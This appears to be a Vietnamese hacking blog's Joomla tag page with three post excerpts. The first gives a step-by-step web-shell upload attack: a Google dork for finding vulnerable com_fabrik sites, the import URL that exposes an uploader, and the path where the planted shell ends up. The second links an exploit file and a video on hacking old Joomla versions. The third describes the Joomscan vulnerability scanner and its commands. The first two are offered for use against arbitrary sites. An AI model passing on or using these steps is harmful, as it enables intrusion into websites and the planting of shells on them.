Hiển thị các bài đăng có nhãn Joomla. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Joomla. Hiển thị tất cả bài đăng

Joomla Shell Upload Vulnerability

requirements:
1.mind
use this google dork to find vulnerable joomla sites ## 
google dork : inurl:index.php?option=com_fabrik


after open the sites replace with this address ##

index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1
for example ##
"www.xyz.com/index.php" to "www.xyz.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1"


after that if you see uploder then congratulations....
upload your shell.

shell path will be ##
www.xyz.com/media/shell_name.php


Xem Thêm

 

Joomla Exploit (Code)

In this video you will learn how to hack joomla
Note:- This exploit only works on old version of joomla

Download and open the below file in your browser
https://www.dropbox.com/s/yoo0xkjem8cf0it/x.html 

Open it and edit it with your Username & Pass

Note:- you need to put different pass here password should not match

Follow the video for proper guidance and do the steps

Xem Thêm

 

[Tool] Joomscan Security Scanner - Update 611 lỗ hổng của Joomla

Hi All,


Nhóm Web-center Security Team của Slovenia vừa update phiên bản mới cho công cụ quét lỗ hổng mang tên Joomscan.

Joomscan là công cụ nhỏ gọn viết bằng ngôn ngữ PERL,dùng scan ứng dụng Joomla.

Ở lần update này,database lỗ hổng đã tăng lên 611 vuls so với 550 vuls vào tháng 11 năm ngoái.

Có thể update thông qua command-line (terminal) bằng lệnh :./joomscan.pl update

Cú pháp sử dụng khá đơn giản :

VD:
- Để scan website uns.vn ta sử dụng : ./joomscan.pl -u uns.vn
- Chi tiết các options : ./joomscan.pl

_LINK DOWNLOAD :
- Windows : http://web-center.si...an/joomscan.rar
- Linux : http://web-center.si...joomscan.tar.gz

Các bạn có thể download source về để optimize và bỏ vào toolbox.

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương